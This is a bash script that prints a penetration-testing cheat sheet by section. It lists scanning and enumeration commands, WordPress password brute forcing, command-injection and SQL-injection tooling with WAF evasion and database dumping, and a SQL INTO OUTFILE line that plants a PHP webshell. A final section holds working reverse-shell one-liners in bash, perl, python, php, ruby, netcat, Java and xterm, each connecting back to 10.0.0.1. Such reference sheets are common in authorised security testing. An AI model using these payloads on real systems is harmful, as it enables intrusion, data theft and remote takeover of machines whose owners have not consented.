#!/bin/bash

print_nmap() {
    cat <<EOF
===============================================================================
===Nmap====
nmap -p- -sT -sV -A
nmap -p- -sC -sV  --open
nmap -p- --script=vuln
###HTTP-Methods
nmap --script http-methods --script-args http-methods.url-path='/website' <target>
###  --script smb-enum-shares
sed IPs:
grep -oE '((1?[0-9][0-9]?|2[0-4][0-9]|25[0-5])\.){3}(1?[0-9][0-9]?|2[0-4][0-9]|25[0-5])' FILE
EOF
}

print_wpscan_ssl() {
    cat <<EOF
================================================================================
===WPScan & SSL
wpscan --url  --disable-tls-checks --enumerate p --enumerate t --enumerate u

===WPScan Brute Forceing:
wpscan --url  --disable-tls-checks -U users -P /usr/share/wordlists/rockyou.txt

===Aggressive Plugin Detection:
wpscan --url  --enumerate p --plugins-detection aggressive
EOF
}

print_nikto_ssl_evasion() {
    cat <<EOF
================================================================================
===Nikto with SSL and Evasion
nikto --host  -ssl -evasion 1
SEE EVASION MODALITIES.
EOF
}

print_dns_recon() {
    cat <<EOF
================================================================================
===dns_recon
dnsrecon –d yourdomain.com
EOF
}

print_gobuster_directory() {
    cat <<EOF
===gobuster directory
gobuster dir -u "$URL" -w /opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt -k -t 30
EOF
}

print_gobuster_files() {
    cat <<EOF
===gobuster files
gobuster dir -u "$URL" -w /opt/SecLists/Discovery/Web-Content/raft-medium-files.txt -k -t 30
gobuster dir -u "$URL" -w /opt/SecLists/Discovery/Web-Content/common.txt -t 80 -a Linux -x .txt,.php
EOF
}

print_gobuster_subdomain() {
    cat <<EOF
===gobuster for SubDomain brute forcing:
gobuster dns -d domain.org -w /opt/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 30
just make sure any DNS name you find resolves to an in-scope address before you test it
EOF
}

print_extract_ips() {
    cat <<EOF
===Extract IPs from a text file.
grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' nmapfile.txt
EOF
}

print_wfuzz_xss() {
    cat <<EOF
================================================================================
===Wfuzz XSS Fuzzing============================================================
wfuzz -c -z file,/opt/SecLists/Fuzzing/XSS/XSS-BruteLogic.txt
wfuzz -c -z file,/opt/SecLists/Fuzzing/XSS/XSS-Jhaddix.txt

===COMMAND INJECTION WITH POST DATA
wfuzz -c -z file,/opt/SecLists/Fuzzing/command-injection-commix.txt -d doi=FUZZ

===Test for Parameter Existence!
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/burp-parameter-names.txt

===AUTHENTICATED FUZZING DIRECTORIES:
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt --hc 404 -d SESSIONID=value

===AUTHENTICATED FILE FUZZING:
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-medium-files.txt --hc 404 -d SESSIONID=value

===FUZZ Directories:
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-large-directories.txt --hc 404

===FUZZ FILES:
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-large-files.txt --hc 404
|
LARGE WORDS:
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-large-words.txt --hc 404
|
USERS:
wfuzz -c -z file,/opt/SecLists/Usernames/top-usernames-shortlist.txt --hc 404,403
EOF
}

print_commix() {
    cat <<EOF
================================================================================
===Command Injection with commix, ssl, waf, random agent.
commix --url=https://supermegaleetultradomain.com?parameter= --level=3 --force-ssl --skip-waf --random-agent
EOF
}

print_sqlmap() {
    cat <<EOF
================================================================================
===SQLMap
sqlmap -u  --threads=2 --time-sec=10 --level=2 --risk=2 --technique=T --force-ssl
sqlmap -u  --threads=2 --time-sec=10 --level=4 --risk=3 --dump
/SecLists/Fuzzing/alphanum-case.txt
EOF
}

print_social_recon() {
    cat <<EOF
================================================================================
===Social Recon
theharvester -d domain.org -l 500 -b google
EOF
}

print_nmap_http_methods() {
    cat <<EOF
================================================================================
===Nmap HTTP-methods
nmap -p80,443 --script=http-methods <ip> --script-args http-methods.url-path='/directory/goes/here'
EOF
}

print_smtp_user_enum() {
    cat <<EOF
================================================================================
===SMTP USER ENUM
smtp-user-enum -M VRFY -U /opt/SecLists/Usernames/xato-net-10-million-usernames.txt -t
smtp-user-enum -M EXPN -U /opt/SecLists/Usernames/xato-net-10-million-usernames.txt -t
smtp-user-enum -M RCPT -U /opt/SecLists/Usernames/xato-net-10-million-usernames.txt -t
smtp-user-enum -M EXPN -U /opt/SecLists/Usernames/xato-net-10-million-usernames.txt -t
EOF
}

print_command_execution() {
    cat <<EOF
===Command Execution Verification - [Ping check]
tcpdump -i any -c5 icmp
====
#Check Network
netdiscover /r 0.0.0.0/24
====
#INTO OUTFILE D00R
SELECT "<?php system(['cmd']); ?>" into outfile "/var/www/WEROOT/backdoor.php";
====
LFI?
#PHP Filter Checks.
php://filter/convert.base64-encode/resource=
====
EOF
}

print_rev_shell(){
    cat << EOF
Bash

Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10):

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

PERL

Here’s a shorter, feature-free version of the perl-reverse-shell:

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

There’s also an alternative PERL revere shell here.
Python

This was tested under Linux / Python 2.7:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP

This code assumes that the TCP connection uses file descriptor 3.  This worked on my test system.  If it doesn’t work, try 4, 5, 6…

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

If you want a .php file to upload, see the more featureful and robust php-reverse-shell.
Ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Netcat

Netcat is rarely present on production systems and even if it is there are several version of netcat, some of which don’t support the -e option.

nc -e /bin/sh 10.0.0.1 1234

If you have the wrong version of netcat installed, Jeff Price points out here that you might still be able to get your reverse shell back like this:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

[Untested submission from anonymous reader]
xterm

One of the simplest forms of reverse shell is an xterm session.  The following command should be run on the server.  It will try to connect back to you (10.0.0.1) on TCP port 6001.

xterm -display 10.0.0.1:1

To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001).  One way to do this is with Xnest (to be run on your system):

Xnest :1

You’ll need to authorise the target to connect to you (command also run on your host):

xhost +targetip
EOF

}
print_all() {
    print_nmap
    print_wpscan_ssl
    print_nikto_ssl_evasion
    print_dns_recon
    print_gobuster_directory
    print_gobuster_files
    print_gobuster_subdomain
    print_extract_ips
    print_wfuzz_xss
    print_commix
    print_sqlmap
    print_social_recon
    print_nmap_http_methods
    print_smtp_user_enum
    print_command_execution
    print_rev_shell
}

_help() {
    echo "Usage: $0 [OPTIONS]"
    echo "Options:"
    echo "  all                   Print the entire text"
    echo "  nmap                  Print Nmap section"
    echo "  wpscan                Print WPScan & SSL section"
    echo "  nikto                 Print Nikto with SSL and Evasion section"
    echo "  dnsrecon              Print dns_recon section"
    echo "  gobuster-directory    Print gobuster directory section"
    echo "  gobuster-files        Print gobuster files section"
    echo "  gobuster-subdomain    Print gobuster for SubDomain brute forcing section"
    echo "  extract-ips           Print Extract IPs from a text file section"
    echo "  wfuzz-xss             Print Wfuzz XSS Fuzzing section"
    echo "  commix                Print Command Injection with commix section"
    echo "  sqlmap                Print SQLMap section"
    echo "  social-recon          Print Social Recon section"
    echo "  nmap-http-methods     Print Nmap HTTP-methods section"
    echo "  smtp-user-enum        Print SMTP USER ENUM section"
    echo "  command-execution     Print Command Execution Verification section"
    echo "  rev_shell             Print Reverse Shell"
    echo "  list                  Display this list"
    echo "  help                  Display this help"
}

main() {
    if [[ -z "$@" ]]; then
        print_all
    fi

    for arg in "$@"; do
        case "$arg" in
            rev_shell)
                print_rev_shell
                ;;
            nmap)
                print_nmap
                ;;
            wpscan)
                print_wpscan_ssl
                ;;
            nikto)
                print_nikto_ssl_evasion
                ;;
            dnsrecon)
                print_dns_recon
                ;;
            gobuster-directory)
                print_gobuster_directory
                ;;
            gobuster-files)
                print_gobuster_files
                ;;
            gobuster-subdomain)
                print_gobuster_subdomain
                ;;
            gobuster)
                print_gobuster_subdomain
                print_gobuster_files
                print_gobuster_directory
                ;;
            extract-ips)
                print_extract_ips
                ;;
            wfuzz)
                print_wfuzz_xss
                ;;
            commix)
                print_commix
                ;;
            sqlmap)
                print_sqlmap
                ;;
            social-recon)
                print_social_recon
                ;;
            nmap-http-methods)
                print_nmap_http_methods
                ;;
            smtp)
                print_smtp_user_enum
                ;;
            command-execution)
                print_command_execution
                ;;
            all)
                print_all
                ;;
            help|list)
                _help
                ;;
            *)
                echo "Unknown option: $arg"
                _help
                exit 1
                ;;
        esac
    done
}

main "$@"
